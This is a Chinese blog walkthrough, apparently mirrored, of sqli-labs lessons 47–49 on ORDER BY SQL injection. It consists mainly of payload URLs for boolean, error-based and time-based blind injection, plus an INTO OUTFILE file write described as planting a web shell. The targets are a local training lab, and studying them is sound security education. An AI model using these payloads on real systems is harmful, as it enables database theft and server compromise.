zoukankan      html  css  js  c++  java
  • SQL注入之Sqli-labs系列第四十七关,第四十八关,第四十九关(ORDER BY注入)

    0x1 源码区别点

    将id变为字符型:
    $sql = "SELECT * FROM users ORDER BY '$id'";

    0x2实例测试

    (1)and rand相结合的方式

    payload:
    http://localhost/sqli-labs-master/Less-47/?sort=1' and rand(ascii(left(database(),1))=116)--+ 

    (2)利用报错的方式进行

    http://192.168.232.135/sqli-labs/Less-47/?sort=1' and (select 1 from(select count(*),concat(0x5c,database(),0x5c,floor(rand(0)*2))x from information_schema.tables group by x)a)--+

    网上摘录语句:
    http://localhost/sqli-labs-master/Less-47/?sort=1' and (select count(*) from information_schema.columns group by concat(0x3e,0x3e,(select database()),0x3e,0x3e,floor(rand()*2)) limit 0,1)--+

     

    (3)另类报错语句

    http://192.168.232.135/sqli-labs/Less-47/?sort=1' and (select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x)--+  

    (4)延迟注入 

    http://192.168.232.135/sqli-labs/Less-47/?sort=1' and (if(ascii(substr(database(),1,1))=116,0,sleep(5)))--+  

    (5)使用into outfile导出文件

    http://localhost:81/sqli-labs-master/Less-47/index.php?sort=1' into outfile "C:/testphp/Apache24/htdocs/sqli-labs-master/Less-47/test.txt" 

    进行网马写入

    后面的十六进制是<? php phpinfo();?>

    0x3第四十八关

    这关和第四十七关的区别在于没有报错信息,也可以采用into outfile

    http://192.168.232.135/sqli-labs/Less-47/?sort=1' and (if(ascii(substr((select username from users limit 0,1),1,1))=69,0,sleep(1)))--+  

    0x4第四十九关

    这关和第四十七关的区别在于没有报错信息 

    http://192.168.232.135/sqli-labs-master/Less-49/?sort=1' and (if(ascii(substr((select username from users limit 0,1),1,1))=69,0,sleep(1)))--+  
  • 相关阅读:
    4-1 软件原型设计
    3-1 案例分析
    2-1 编程作业
    1-2阅读任务
    1-1 准备工作
    第十周学习总结
    实验报告2&&第四周课程总结
    Java实验报告(一)&&第三周学习总结
    第三周编程总结
    2019年春季学期第二周作业
  • 原文地址:https://www.cnblogs.com/AmoBlogs/p/8725793.html
Copyright © 2011-2022 走看看